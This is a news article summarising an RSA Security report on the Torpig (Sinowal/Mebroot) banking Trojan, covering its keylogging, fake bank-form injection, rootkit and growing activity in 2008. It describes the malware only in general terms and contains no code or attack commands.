14 DAY TRIAL // Researchers from RSA Security have released a worrying report regarding what they call “one of the most pervasive and advanced pieces of crimeware ever created by fraudsters“. Dating back to 2006, the Torpig Trojan, also known as Sinowal or Mebroot, is more active than ever and is spreading at an alarming rate, the experts claim.
The first variants of the Torpig Trojan were first detected back in February 2006 and no one has been able to stop it since then. Not only that it is still running today, but its activity has drastically increased in 2008, warn researchers from the RSA FraudAction Research Lab. According to them, “almost three years is a very, very long time for just one online gang to maintain the lifecycle and operations in order to effectively utilize just one Trojan”.
This Trojan is not special because of its playload or propagation or techniques used. In this regard, it is rather similar to other password stealing Trojans. The difference is made by the level of organization that characterizes the cybercriminal group behind it, who successfully built an extensive communications network consisting of thousands of domain names and servers or very well structured data collecting repositories.
What's even more interesting is that after three years, very few details are known about the gang running this cybercrime network. Older records indicate that at some point, the gang had ties with the infamous Russian Business Network (RBN), but that's not the case anymore. Even so, the fact that the Trojan targeted financial institutions from all around the globe, but not a single one from Russia, could point to its origins.
Torpig has keylogging abilities and attempts to mess with many antivirus programs that are installed on the compromised systems. In addition, it is able to drop and install other malware on the infected computers and sends the gathered data to remote servers. The Trojan attempts to trick the users into providing sensitive financial information such as bank account or credit card details. To achieve this, it uses a database of URLs belonging to numerous financial institutions and monitors the browser activity to detect when a user opens one of these addresses. Then, it forces a HTML form prompt in the browser that is made to look as originating from the legit URL and which asks the user to input their financial information.
In addition, the keylogger component gathers login information for e-mail, FTP and other such accounts. The RSA researchers estimate that the Trojan is responsible for compromising around 300,000 online banking accounts and almost as much credit / debit cards, out of which more than 100,000 this year alone. This is the result of a spike in the Trojan's activity in 2008, which might be caused by the introduction of a Master Boot Record (MBR) rootkit component at the beginning of the year.
The researchers advise that the Trojan authors are currently releasing an estimate of over 70 new versions per month in 2008, compared to under 25 in 2007. The number of URLs of financial institutions that trigger the HTML injection on the infected systems has also grown from a few hundreds to a whooping 2,700. “The purpose of this is to maintain the Trojan’s uninterrupted grip on infected computers,” explain the experts.
RSA Security also informs that it is currently working closely with affected parties as well as law enforcement agencies in an attempt to stop or at least slow down the ascension of the Trojan and to inform the owners of the compromised accounts.